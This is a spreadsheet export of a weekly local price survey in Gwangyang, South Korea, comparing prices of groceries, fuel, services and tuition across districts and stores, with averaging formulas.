A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: 5 | E79: 5 | F79: 41,500 | G79: 41,500 | H79: 0 | I79: 0 | J79: =광양읍1!F79 -> 37,500 | K79: =광양읍1!G79 -> 37,500 | L79: 0 | M79: =광양읍2!F79 -> 37,500 | N79: =광양읍2!G79 -> 37,500 | O79: 0 | P79: =중마동1!F79 -> 52,500 | Q79: =중마동1!G79 -> 52,500 | R79: 0 | S79: =중마동2!F79 -> 40,000 | T79: =중마동2!G79 -> 40,000 | U79: 0 | V79: =광영동!F79 -> 40,000 | W79: =광영동!G79 -> 40,000 | X79: 0 | Y79: =옥곡면!F79 -> 0 | Z79: =옥곡면!G79 -> 0 | AA79: 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: 0 | E80: 0 | F80: 0 | G80: 0 | H80: 0 | I80: 0 | J80: =광양읍1!F80 -> 0 | K80: =광양읍1!G80 -> 0 | L80: 0 | M80: =광양읍2!F80 -> 0 | N80: =광양읍2!G80 -> 0 | O80: 0 | P80: =중마동1!F80 -> 0 | Q80: =중마동1!G80 -> 0 | R80: 0 | S80: =중마동2!F80 -> 0 | T80: =중마동2!G80 -> 0 | U80: 0 | V80: =광영동!F80 -> 0 | W80: =광영동!G80 -> 0 | X80: 0 | Y80: =옥곡면!F80 -> 0 | Z80: =옥곡면!G80 -> 0 | AA80: 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: 5 | E81: 5 | F81: 1,210 | G81: 1,240 | H81: 30 | I81: 0 | J81: =광양읍1!F81 -> 1,350 | K81: =광양읍1!G81 -> 1,500 | L81: 0 | M81: =광양읍2!F81 -> 1,400 | N81: =광양읍2!G81 -> 1,400 | O81: 0 | P81: =중마동1!F81 -> 1,200 | Q81: =중마동1!G81 -> 1,200 | R81: 0 | S81: =중마동2!F81 -> 1,000 | T81: =중마동2!G81 -> 1,000 | U81: 0 | V81: =광영동!F81 -> 1,100 | W81: =광영동!G81 -> 1,100 | X81: 0 | Y81: =옥곡면!F81 -> 0 | Z81: =옥곡면!G81 -> 0 | AA81: 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: 6 | E82: 6 | F82: 7,667 | G82: 7,667 | H82: 0 | I82: 0 | J82: =광양읍1!F82 -> 7,000 | K82: =광양읍1!G82 -> 7,000 | L82: 0 | M82: =광양읍2!F82 -> 6,000 | N82: =광양읍2!G82 -> 6,000 | O82: 0 | P82: =중마동1!F82 -> 6,250 | Q82: =중마동1!G82 -> 6,250 | R82: 0 | S82: =중마동2!F82 -> 6,750 | T82: =중마동2!G82 -> 6,750 | U82: 0 | V82: =광영동!F82 -> 16,000 | W82: =광영동!G82 -> 16,000 | X82: 0 | Y82: =옥곡면!F82 -> 4,000 | Z82: =옥곡면!G82 -> 4,000 | AA82: 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: 1 | E83: 1 | F83: 13,500 | G83: 13,500 | H83: 0 | I83: 0 | J83: =광양읍1!F83 -> 0 | K83: =광양읍1!G83 -> 0 | L83: 0 | M83: =광양읍2!F83 -> 0 | N83: =광양읍2!G83 -> 0 | O83: 0 | P83: =중마동1!F83 -> 0 | Q83: =중마동1!G83 -> 0 | R83: 0 | S83: =중마동2!F83 -> 0 | T83: =중마동2!G83 -> 0 | U83: 0 | V83: =광영동!F83 -> 13,500 | W83: =광영동!G83 -> 13,500 | X83: 0 | Y83: =옥곡면!F83 -> 0 | Z83: =옥곡면!G83 -> 0 | AA83: 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: 0 | E84: 0 | F84: 0 | G84: 0 | H84: 0 | I84: 0 | J84: =광양읍1!F84 -> 0 | K84: =광양읍1!G84 -> 0 | L84: 0 | M84: =광양읍2!F84 -> 0 | N84: =광양읍2!G84 -> 0 | O84: 0 | P84: =중마동1!F84 -> 0 | Q84: =중마동1!G84 -> 0 | R84: 0 | S84: =중마동2!F84 -> 0 | T84: =중마동2!G84 -> 0 | U84: 0 | V84: =광영동!F84 -> 0 | W84: =광영동!G84 -> 0 | X84: 0 | Y84: =옥곡면!F84 -> 0 | Z84: =옥곡면!G84 -> 0 | AA84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: 6 | E86: 6 | F86: 5,755 | G86: 5,755 | H86: 0 | I86: =IF(F86=0,0,((G86-F86)/F86)) -> 0 | J86: =광양읍1!F86 -> 5,470 | K86: =광양읍1!G86 -> 5,470 | L86: =광양읍1!H86 -> 0 | M86: =광양읍2!F86 -> 6,050 | N86: =광양읍2!G86 -> 6,050 | O86: =광양읍2!H86 -> 0 | P86: =중마동1!F86 -> 5,700 | Q86: =중마동1!G86 -> 5,700 | R86: =중마동1!H86 -> 0 | S86: =중마동2!F86 -> 6,335 | T86: =중마동2!G86 -> 6,335 | U86: =중마동2!H86 -> 0 | V86: =광영동!F86 -> 5,625 | W86: =광영동!G86 -> 5,625 | X86: =광영동!H86 -> 0 | Y86: =옥곡면!F86 -> 5,350 | Z86: =옥곡면!G86 -> 5,350 | AA86: =옥곡면!H86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: 6 | E87: 6 | F87: 1,314 | G87: 1,320 | H87: 6 | I87: =IF(F87=0,0,((G87-F87)/F87)) -> 0 | J87: =광양읍1!F87 -> 1,350 | K87: =광양읍1!G87 -> 1,350 | L87: =광양읍1!H87 -> 0 | M87: =광양읍2!F87 -> 1,475 | N87: =광양읍2!G87 -> 1,475 | O87: =광양읍2!H87 -> 0 | P87: =중마동1!F87 -> 1,590 | Q87: =중마동1!G87 -> 1,625 | R87: =중마동1!H87 -> 35 | S87: =중마동2!F87 -> 1,425 | T87: =중마동2!G87 -> 1,425 | U87: =중마동2!H87 -> 0 | V87: =광영동!F87 -> 970 | W87: =광영동!G87 -> 970 | X87: =광영동!H87 -> 0 | Y87: =옥곡면!F87 -> 1,075 | Z87: =옥곡면!G87 -> 1,075 | AA87: =옥곡면!H87 -> 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: 6 | E88: 6 | F88: 1,133 | G88: 1,133 | H88: 0 | I88: 0 | J88: =광양읍1!F88 -> 1,135 | K88: =광양읍1!G88 -> 1,135 | L88: =광양읍1!H88 -> 0 | M88: =광양읍2!F88 -> 1,200 | N88: =광양읍2!G88 -> 1,200 | O88: =광양읍2!H88 -> 0 | P88: =중마동1!F88 -> 1,070 | Q88: =중마동1!G88 -> 1,070 | R88: =중마동1!H88 -> 0 | S88: =중마동2!F88 -> 1,175 | T88: =중마동2!G88 -> 1,175 | U88: =중마동2!H88 -> 0 | V88: =광영동!F88 -> 1,140 | W88: =광영동!G88 -> 1,140 | X88: =광영동!H88 -> 0 | Y88: =옥곡면!F88 -> 1,080 | Z88: =옥곡면!G88 -> 1,080 | AA88: =옥곡면!H88 -> 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: 6 | E89: 6 | F89: 7,871 | G89: 7,558 | H89: -313 | I89: -0 | J89: =광양읍1!F89 -> 6,985 | K89: =광양읍1!G89 -> 6,985 | L89: =광양읍1!H89 -> 0 | M89: =광양읍2!F89 -> 8,850 | N89: =광양읍2!G89 -> 8,850 | O89: =광양읍2!H89 -> 0 | P89: =중마동1!F89 -> 8,480 | Q89: =중마동1!G89 -> 8,480 | R89: =중마동1!H89 -> 0 | S89: =중마동2!F89 -> 8,950 | T89: =중마동2!G89 -> 7,575 | U89: =중마동2!H89 -> -1,375 | V89: =광영동!F89 -> 6,980 | W89: =광영동!G89 -> 6,480 | X89: =광영동!H89 -> -500 | Y89: =옥곡면!F89 -> 6,980 | Z89: =옥곡면!G89 -> 6,980 | AA89: =옥곡면!H89 -> 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: 6 | E90: 6 | F90: 2,791 | G90: 2,791 | H90: 0 | I90: 0 | J90: =광양읍1!F90 -> 2,935 | K90: =광양읍1!G90 -> 2,935 | L90: =광양읍1!H90 -> 0 | M90: =광양읍2!F90 -> 3,250 | N90: =광양읍2!G90 -> 3,250 | O90: =광양읍2!H90 -> 0 | P90: =중마동1!F90 -> 2,380 | Q90: =중마동1!G90 -> 2,380 | R90: =중마동1!H90 -> 0 | S90: =중마동2!F90 -> 3,120 | T90: =중마동2!G90 -> 3,120 | U90: =중마동2!H90 -> 0 | V90: =광영동!F90 -> 2,680 | W90: =광영동!G90 -> 2,680 | X90: =광영동!H90 -> 0 | Y90: =옥곡면!F90 -> 2,380 | Z90: =옥곡면!G90 -> 2,380 | AA90: =옥곡면!H90 -> 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: 6 | E91: 6 | F91: 438 | G91: 438 | H91: 0 | I91: 0 | J91: =광양읍1!F91 -> 320 | K91: =광양읍1!G91 -> 320 | L91: =광양읍1!H91 -> 0 | M91: =광양읍2!F91 -> 425 | N91: =광양읍2!G91 -> 425 | O91: =광양읍2!H91 -> 0 | P91: =중마동1!F91 -> 455 | Q91: =중마동1!G91 -> 455 | R91: =중마동1!H91 -> 0 | S91: =중마동2!F91 -> 575 | T91: =중마동2!G91 -> 575 | U91: =중마동2!H91 -> 0 | V91: =광영동!F91 -> 515 | W91: =광영동!G91 -> 515 | X91: =광영동!H91 -> 0 | Y91: =옥곡면!F91 -> 340 | Z91: =옥곡면!G91 -> 340 | AA91: =옥곡면!H91 -> 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: 6 | E92: 6 | F92: 1,750 | G92: 1,757 | H92: 7 | I92: 0 | J92: =광양읍1!F92 -> 1,680 | K92: =광양읍1!G92 -> 1,680 | L92: =광양읍1!H92 -> 0 | M92: =광양읍2!F92 -> 1,875 | N92: =광양읍2!G92 -> 1,875 | O92: =광양읍2!H92 -> 0 | P92: =중마동1!F92 -> 1,695 | Q92: =중마동1!G92 -> 1,695 | R92: =중마동1!H92 -> 0 | S92: =중마동2!F92 -> 1,820 | T92: =중마동2!G92 -> 1,860 | U92: =중마동2!H92 -> 40 | V92: =광영동!F92 -> 1,760 | W92: =광영동!G92 -> 1,760 | X92: =광영동!H92 -> 0 | Y92: =옥곡면!F92 -> 1,670 | Z92: =옥곡면!G92 -> 1,670 | AA92: =옥곡면!H92 -> 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: 6 | E93: 6 | F93: 1,455 | G93: 1,447 | H93: -8 | I93: -0 | J93: =광양읍1!F93 -> 1,360 | K93: =광양읍1!G93 -> 1,360 | L93: =광양읍1!H93 -> 0 | M93: =광양읍2!F93 -> 1,675 | N93: =광양읍2!G93 -> 1,625 | O93: =광양읍2!H93 -> -50 | P93: =중마동1!F93 -> 1,345 | Q93: =중마동1!G93 -> 1,345 | R93: =중마동1!H93 -> 0 | S93: =중마동2!F93 -> 1,540 | T93: =중마동2!G93 -> 1,540 | U93: =중마동2!H93 -> 0 | V93: =광영동!F93 -> 1,470 | W93: =광영동!G93 -> 1,470 | X93: =광영동!H93 -> 0 | Y93: =옥곡면!F93 -> 1,340 | Z93: =옥곡면!G93 -> 1,340 | AA93: =옥곡면!H93 -> 0
A94: 9 | B94: 등유 | C94: 주유소 1ℓ | D94: 2 | E94: 2 | F94: 1,375 | G94: 1,375 | H94: 0 | I94: 0 | J94: =광양읍1!F94 -> 1,400 | K94: =광양읍1!G94 -> 1,400 | L94: =광양읍1!H94 -> 0 | M94: =광양읍2!F94 -> 1,350 | N94: =광양읍2!G94 -> 1,350 | O94: =광양읍2!H94 -> 0 | P94: =중마동1!F94 -> 0 | Q94: =중마동1!G94 -> 0 | R94: =중마동1!H94 -> 0 | S94: =중마동2!F94 -> 0 | T94: =중마동2!G94 -> 0 | U94: =중마동2!H94 -> 0 | V94: =광영동!F94 -> 0 | W94: =광영동!G94 -> 0 | X94: =광영동!H94 -> 0 | Y94: =옥곡면!F94 -> 0 | Z94: =옥곡면!G94 -> 0 | AA94: =옥곡면!H94 -> 0
A95: 10 | B95: 경유 | C95: 주유소 1ℓ | D95: 5 | E95: 5 | F95: 1,472 | G95: 1,481 | H95: 8 | I95: 0 | J95: =광양읍1!F95 -> 1,457 | K95: =광양읍1!G95 -> 1,485 | L95: =광양읍1!H95 -> 28 | M95: =광양읍2!F95 -> 1,470 | N95: =광양읍2!G95 -> 1,470 | O95: =광양읍2!H95 -> 0 | P95: =중마동1!F95 -> 1,504 | Q95: =중마동1!G95 -> 1,504 | R95: =중마동1!H95 -> 0 | S95: =중마동2!F95 -> 1,488 | T95: =중마동2!G95 -> 1,488 | U95: =중마동2!H95 -> 0 | V95: =광영동!F95 -> 1,444 | W95: =광영동!G95 -> 1,457 | X95: =광영동!H95 -> 13 | Y95: =옥곡면!F95 -> 0 | Z95: =옥곡면!G95 -> 0 | AA95: =옥곡면!H95 -> 0
A96: 11 | B96: 휘발유 | C96: 주유소 1ℓ (무연) | D96: 5 | E96: 5 | F96: 1,554 | G96: 1,574 | H96: 20 | I96: 0 | J96: =광양읍1!F96 -> 1,541 | K96: =광양읍1!G96 -> 1,576 | L96: =광양읍1!H96 -> 35 | M96: =광양읍2!F96 -> 1,545 | N96: =광양읍2!G96 -> 1,560 | O96: =광양읍2!H96 -> 15 | P96: =중마동1!F96 -> 1,578 | Q96: =중마동1!G96 -> 1,589 | R96: =중마동1!H96 -> 11 | S96: =중마동2!F96 -> 1,558 | T96: =중마동2!G96 -> 1,578 | U96: =중마동2!H96 -> 21 | V96: =광영동!F96 -> 1,547 | W96: =광영동!G96 -> 1,567 | X96: =광영동!H96 -> 20 | Y96: =옥곡면!F96 -> 0 | Z96: =옥곡면!G96 -> 0 | AA96: 0
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: 5 | E97: 5 | F97: 143,161 | G97: 143,161 | H97: 0 | I97: 0 | J97: =광양읍1!F97 -> 130,000 | K97: =광양읍1!G97 -> 130,000 | L97: =광양읍1!H97 -> 0 | M97: =광양읍2!F97 -> 145,805 | N97: =광양읍2!G97 -> 145,805 | O97: =광양읍2!H97 -> 0 | P97: =중마동1!F97 -> 150,000 | Q97: =중마동1!G97 -> 150,000 | R97: =중마동1!H97 -> 0 | S97: =중마동2!F97 -> 150,000 | T97: =중마동2!G97 -> 150,000 | U97: =중마동2!H97 -> 0 | V97: =광영동!F97 -> 140,000 | W97: =광영동!G97 -> 140,000 | X97: =광영동!H97 -> 0 | Y97: =옥곡면!F97 -> 0 | Z97: =옥곡면!G97 -> 0 | AA97: =옥곡면!H97 -> 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: 5 | E98: 5 | F98: 141,000 | G98: 141,000 | H98: 0 | I98: 0 | J98: =광양읍1!F98 -> 145,000 | K98: =광양읍1!G98 -> 145,000 | L98: =광양읍1!H98 -> 0 | M98: =광양읍2!F98 -> 135,000 | N98: =광양읍2!G98 -> 135,000 | O98: =광양읍2!H98 -> 0 | P98: =중마동1!F98 -> 155,000 | Q98: =중마동1!G98 -> 155,000 | R98: =중마동1!H98 -> 0 | S98: =중마동2!F98 -> 150,000 | T98: =중마동2!G98 -> 150,000 | U98: =중마동2!H98 -> 0 | V98: =광영동!F98 -> 120,000 | W98: =광영동!G98 -> 120,000 | X98: =광영동!H98 -> 0 | Y98: =옥곡면!F98 -> 0 | Z98: =옥곡면!G98 -> 0 | AA98: =옥곡면!H98 -> 0
V100: 1,534

Sheet 광양읍1
A2: 주 간 물 가 동 향(광양읍)
M3: 조사자 : 이문주
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(농협하나로마트) | M4: 조 사 2 지 역(트라이얼코리아)
F5: 금주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미 20kg | D7: =COUNTIF(J7,"<>0")+COUNTIF(N7,"<>0") -> 2 | E7: =COUNTIF(K7,"<>0")+COUNTIF(O7,"<>0") -> 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 59,450 | G7: =IF(E7=0,0,SUM(K7,O7)/E7) -> 59,450 | H7: =G7-F7 -> 0 | I7: 농협하나로마트 | J7: 57000 | K7: 57000 | L7: =K7-J7 -> 0 | M7: 트라이얼코리아 | N7: 61,900 | O7: 61,900 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: =COUNTIF(J8,"<>0")+COUNTIF(N8,"<>0") -> 2 | E8: =COUNTIF(K8,"<>0")+COUNTIF(O8,"<>0") -> 2 | F8: =IF(D8=0,0,SUM(J8,N8)/D8) -> 1,313 | G8: =IF(E8=0,0,SUM(K8,O8)/E8) -> 1,085 | H8: =G8-F8 -> -228 | I8: 농협하나로마트 | J8: 1451 | K8: 941 | L8: =K8-J8 -> -510 | M8: 트라이얼코리아 | N8: 1,174 | O8: 1,229 | P8: =O8-N8 -> 55
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: =COUNTIF(J9,"<>0")+COUNTIF(N9,"<>0") -> 2 | E9: =COUNTIF(K9,"<>0")+COUNTIF(O9,"<>0") -> 2 | F9: =IF(D9=0,0,SUM(J9,N9)/D9) -> 6,333 | G9: =IF(E9=0,0,SUM(K9,O9)/E9) -> 7,383 | H9: =G9-F9 -> 1,050 | I9: 농협하나로마트 | J9: 4885 | K9: 6785 | L9: =K9-J9 -> 1,900 | M9: 트라이얼코리아 | N9: 7,781 | O9: 7,980 | P9: =O9-N9 -> 199
A10: 4 | B10: 양상추 | C10: 상품1개(350~400g) | D10: =COUNTIF(J10,"<>0")+COUNTIF(N10,"<>0") -> 2 | E10: =COUNTIF(K10,"<>0")+COUNTIF(O10,"<>0") -> 2 | F10: =IF(D10=0,0,SUM(J10,N10)/D10) -> 1,350 | G10: =IF(E10=0,0,SUM(K10,O10)/E10) -> 2,762 | H10: =G10-F10 -> 1,412 | I10: 농협하나로마트 | J10: 1,115 | K10: 2,333 | L10: =K10-J10 -> 1,218 | M10: 트라이얼코리아 | N10: 1,585 | O10: 3,190 | P10: =O10-N10 -> 1,605
A11: 5 | B11: 애호박 | C11: 상품1개(300~350g) | D11: =COUNTIF(J11,"<>0")+COUNTIF(N11,"<>0") -> 2 | E11: =COUNTIF(K11,"<>0")+COUNTIF(O11,"<>0") -> 2 | F11: =IF(D11=0,0,SUM(J11,N11)/D11) -> 2,895 | G11: =IF(E11=0,0,SUM(K11,O11)/E11) -> 3,145 | H11: =G11-F11 -> 250 | I11: 농협하나로마트 | J11: 3,300 | K11: 3,300 | L11: =K11-J11 -> 0 | M11: 트라이얼코리아 | N11: 2,490 | O11: 2,990 | P11: =O11-N11 -> 500
A12: 6 | B12: 열무 | C12: 상품 4kg(1단) | D12: =COUNTIF(J12,"<>0")+COUNTIF(N12,"<>0") -> 0 | E12: =COUNTIF(K12,"<>0")+COUNTIF(O12,"<>0") -> 0 | F12: =IF(D12=0,0,SUM(J12,N12)/D12) -> 0 | G12: =IF(E12=0,0,SUM(K12,O12)/E12) -> 0 | H12: =G12-F12 -> 0 | I12: 농협하나로마트 | J12: 0 | K12: 0 | L12: =K12-J12 -> 0 | M12: 트라이얼코리아 | N12: 0 | O12: 0 | P12: =O12-N12 -> 0
A13: 7 | B13: 양파 | C13: 1망 1kg | D13: =COUNTIF(J13,"<>0")+COUNTIF(N13,"<>0") -> 2 | E13: =COUNTIF(K13,"<>0")+COUNTIF(O13,"<>0") -> 2 | F13: =IF(D13=0,0,SUM(J13,N13)/D13) -> 3,345 | G13: =IF(E13=0,0,SUM(K13,O13)/E13) -> 2,995 | H13: =G13-F13 -> -350 | I13: 농협하나로마트 | J13: 3200 | K13: 3500 | L13: =K13-J13 -> 300 | M13: 트라이얼코리아 | N13: 3,490 | O13: 2,490 | P13: =O13-N13 -> -1,000
A14: 8 | B14: 오이 | C14: 상품 3개 | D14: =COUNTIF(J14,"<>0")+COUNTIF(N14,"<>0") -> 2 | E14: =COUNTIF(K14,"<>0")+COUNTIF(O14,"<>0") -> 2 | F14: =IF(D14=0,0,SUM(J14,N14)/D14) -> 5,243 | G14: =IF(E14=0,0,SUM(K14,O14)/E14) -> 5,443 | H14: =G14-F14 -> 200 | I14: 농협하나로마트 | J14: 4500 | K14: 4900 | L14: =K14-J14 -> 400 | M14: 트라이얼코리아 | N14: 5,985 | O14: 5,985 | P14: =O14-N14 -> 0
A15: 9 | B15: 풋고추 | C15: 신선한것 1kg | D15: =COUNTIF(J15,"<>0")+COUNTIF(N15,"<>0") -> 2 | E15: =COUNTIF(K15,"<>0")+COUNTIF(O15,"<>0") -> 2 | F15: =IF(D15=0,0,SUM(J15,N15)/D15) -> 24,115 | G15: =IF(E15=0,0,SUM(K15,O15)/E15) -> 25,560 | H15: =G15-F15 -> 1,445 | I15: 농협하나로마트 | J15: 18229 | K15: 26119 | L15: =K15-J15 -> 7,890 | M15: 트라이얼코리아 | N15: 30,000 | O15: 25,000 | P15: =O15-N15 -> -5,000
A16: 10 | B16: 마늘 | C16: 깐것 상품 1kg | D16: =COUNTIF(J16,"<>0")+COUNTIF(N16,"<>0") -> 2 | E16: =COUNTIF(K16,"<>0")+COUNTIF(O16,"<>0") -> 2 | F16: =IF(D16=0,0,SUM(J16,N16)/D16) -> 9,900 | G16: =IF(E16=0,0,SUM(K16,O16)/E16) -> 9,900 | H16: =G16-F16 -> 0 | I16: 농협하나로마트 | J16: 9900 | K16: 9900 | L16: =K16-J16 -> 0 | M16: 트라이얼코리아 | N16: 9,900 | O16: 9,900 | P16: =O16-N16 -> 0
A17: 11 | B17: 감자 | C17: 흰색 1kg | D17: =COUNTIF(J17,"<>0")+COUNTIF(N17,"<>0") -> 2 | E17: =COUNTIF(K17,"<>0")+COUNTIF(O17,"<>0") -> 2 | F17: =IF(D17=0,0,SUM(J17,N17)/D17) -> 6,450 | G17: =IF(E17=0,0,SUM(K17,O17)/E17) -> 5,950 | H17: =G17-F17 -> -500 | I17: 농협하나로마트 | J17: 6999 | K17: 6000 | L17: =K17-J17 -> -999 | M17: 트라이얼코리아 | N17: 5,900 | O17: 5,900 | P17: =O17-N17 -> 0
A18: 12 | B18: 배추 | C18: 1포기 3kg | D18: =COUNTIF(J18,"<>0")+COUNTIF(N18,"<>0") -> 2 | E18: =COUNTIF(K18,"<>0")+COUNTIF(O18,"<>0") -> 2 | F18: =IF(D18=0,0,SUM(J18,N18)/D18) -> 4,795 | G18: =IF(E18=0,0,SUM(K18,O18)/E18) -> 4,995 | H18: =G18-F18 -> 200 | I18: 농협하나로마트 | J18: 4600 | K18: 4000 | L18: =K18-J18 -> -600 | M18: 트라이얼코리아 | N18: 4,990 | O18: 5,990 | P18: =O18-N18 -> 1,000
A19: 13 | B19: 콩나물 | C19: 1봉지 500g | D19: =COUNTIF(J19,"<>0")+COUNTIF(N19,"<>0") -> 2 | E19: =COUNTIF(K19,"<>0")+COUNTIF(O19,"<>0") -> 2 | F19: =IF(D19=0,0,SUM(J19,N19)/D19) -> 2,158 | G19: =IF(E19=0,0,SUM(K19,O19)/E19) -> 2,158 | H19: =G19-F19 -> 0 | I19: 농협하나로마트 | J19: 2625 | K19: 2625 | L19: =K19-J19 -> 0 | M19: 트라이얼코리아 | N19: 1,690 | O19: 1,690 | P19: =O19-N19 -> 0
A20: 14 | B20: 사과 | C20: 상품 1개(300∼350g) | D20: =COUNTIF(J20,"<>0")+COUNTIF(N20,"<>0") -> 2 | E20: =COUNTIF(K20,"<>0")+COUNTIF(O20,"<>0") -> 2 | F20: =IF(D20=0,0,SUM(J20,N20)/D20) -> 4,650 | G20: =IF(E20=0,0,SUM(K20,O20)/E20) -> 5,250 | H20: =G20-F20 -> 600 | I20: 농협하나로마트 | J20: 5600 | K20: 5600 | L20: =K20-J20 -> 0 | M20: 트라이얼코리아 | N20: 3,700 | O20: 4,900 | P20: =O20-N20 -> 1,200
A21: 15 | B21: 배 | C21: 상품 1개(650∼700g) | D21: =COUNTIF(J21,"<>0")+COUNTIF(N21,"<>0") -> 2 | E21: =COUNTIF(K21,"<>0")+COUNTIF(O21,"<>0") -> 2 | F21: =IF(D21=0,0,SUM(J21,N21)/D21) -> 5,250 | G21: =IF(E21=0,0,SUM(K21,O21)/E21) -> 5,850 | H21: =G21-F21 -> 600 | I21: 농협하나로마트 | J21: 6800 | K21: 6800 | L21: =K21-J21 -> 0 | M21: 트라이얼코리아 | N21: 3,700 | O21: 4,900 | P21: =O21-N21 -> 1,200
A22: 16 | B22: 바나나 | C22: 상품 1kg | D22: =COUNTIF(J22,"<>0")+COUNTIF(N22,"<>0") -> 2 | E22: =COUNTIF(K22,"<>0")+COUNTIF(O22,"<>0") -> 2 | F22: =IF(D22=0,0,SUM(J22,N22)/D22) -> 3,094 | G22: =IF(E22=0,0,SUM(K22,O22)/E22) -> 4,204 | H22: =G22-F22 -> 1,111 | I22: 농협하나로마트 | J22: 3,092 | K22: 5,172 | L22: =K22-J22 -> 2,080 | M22: 트라이얼코리아 | N22: 3,095 | O22: 3,236 | P22: =O22-N22 -> 141
A23: 17 | B23: 쇠고기 (한우) | C23: 등심 600g(상등육) | D23: =COUNTIF(J23,"<>0")+COUNTIF(N23,"<>0") -> 2 | E23: =COUNTIF(K23,"<>0")+COUNTIF(O23,"<>0") -> 2 | F23: =IF(D23=0,0,SUM(J23,N23)/D23) -> 66,000 | G23: =IF(E23=0,0,SUM(K23,O23)/E23) -> 41,250 | H23: =G23-F23 -> -24,750 | I23: 농협하나로마트 | J23: 66,000 | K23: 75,000 | L23: =K23-J23 -> 9,000 | M23: 트라이얼코리아 | N23: 66,000 | O23: 7,500 | P23: =O23-N23 -> -58,500
A24: 18 | B24: 쇠고기 (수입육) | C24: 등심 600g(상등육) | D24: =COUNTIF(J24,"<>0")+COUNTIF(N24,"<>0") -> 0 | E24: =COUNTIF(K24,"<>0")+COUNTIF(O24,"<>0") -> 0 | F24: =IF(D24=0,0,SUM(J24,N24)/D24) -> 0 | G24: =IF(E24=0,0,SUM(K24,O24)/E24) -> 0 | H24: =G24-F24 -> 0 | I24: 농협하나로마트 | J24: 0 | K24: 0 | L24: =K24-J24 -> 0 | M24: 트라이얼코리아 | N24: 0 | O24: 0 | P24: =O24-N24 -> 0
A25: 19 | B25: 돼지고기 | C25: 삼겹살 600g(상등육) | D25: =COUNTIF(J25,"<>0")+COUNTIF(N25,"<>0") -> 2 | E25: =COUNTIF(K25,"<>0")+COUNTIF(O25,"<>0") -> 2 | F25: =IF(D25=0,0,SUM(J25,N25)/D25) -> 14,100 | G25: =IF(E25=0,0,SUM(K25,O25)/E25) -> 14,100 | H25: =G25-F25 -> 0 | I25: 농협하나로마트 | J25: 14,100 | K25: 14,100 | L25: =K25-J25 -> 0 | M25: 트라이얼코리아 | N25: 14,100 | O25: 14,100 | P25: =O25-N25 -> 0
A26: 20 | B26: 닭고기 | C26: 육계 1마리(1kg 정도) | D26: =COUNTIF(J26,"<>0")+COUNTIF(N26,"<>0") -> 2 | E26: =COUNTIF(K26,"<>0")+COUNTIF(O26,"<>0") -> 2 | F26: =IF(D26=0,0,SUM(J26,N26)/D26) -> 7,150 | G26: =IF(E26=0,0,SUM(K26,O26)/E26) -> 7,250 | H26: =G26-F26 -> 100 | I26: 농협하나로마트 | J26: 7,500 | K26: 7,500 | L26: =K26-J26 -> 0 | M26: 트라이얼코리아 | N26: 6,800 | O26: 7,000 | P26: =O26-N26 -> 200
A27: 21 | B27: 달걀 | C27: 특란 30개 한판 | D27: =COUNTIF(J27,"<>0")+COUNTIF(N27,"<>0") -> 2 | E27: =COUNTIF(K27,"<>0")+COUNTIF(O27,"<>0") -> 2 | F27: =IF(D27=0,0,SUM(J27,N27)/D27) -> 7,920 | G27: =IF(E27=0,0,SUM(K27,O27)/E27) -> 6,920 | H27: =G27-F27 -> -1,000 | I27: 농협하나로마트 | J27: 8,850 | K27: 8,850 | L27: =K27-J27 -> 0 | M27: 트라이얼코리아 | N27: 6,990 | O27: 4,990 | P27: =O27-N27 -> -2,000
A28: 22 | B28: 조기 | C28: 15cm 1마리 | D28: =COUNTIF(J28,"<>0")+COUNTIF(N28,"<>0") -> 1 | E28: =COUNTIF(K28,"<>0")+COUNTIF(O28,"<>0") -> 1 | F28: =IF(D28=0,0,SUM(J28,N28)/D28) -> 1,633 | G28: =IF(E28=0,0,SUM(K28,O28)/E28) -> 2,600 | H28: =G28-F28 -> 967 | I28: 농협하나로마트 | J28: 1,633 | K28: 2,600 | L28: =K28-J28 -> 967 | M28: 트라이얼코리아 | N28: 0 | O28: 0 | P28: =O28-N28 -> 0
A29: 23 | B29: 갈치 | C29: 60cm 1마리 | D29: =COUNTIF(J29,"<>0")+COUNTIF(N29,"<>0") -> 1 | E29: =COUNTIF(K29,"<>0")+COUNTIF(O29,"<>0") -> 1 | F29: =IF(D29=0,0,SUM(J29,N29)/D29) -> 7,000 | G29: =IF(E29=0,0,SUM(K29,O29)/E29) -> 7,800 | H29: =G29-F29 -> 800 | I29: 농협하나로마트 | J29: 7,000 | K29: 7,800 | L29: =K29-J29 -> 800 | M29: 트라이얼코리아 | N29: 0 | O29: 0 | P29: =O29-N29 -> 0
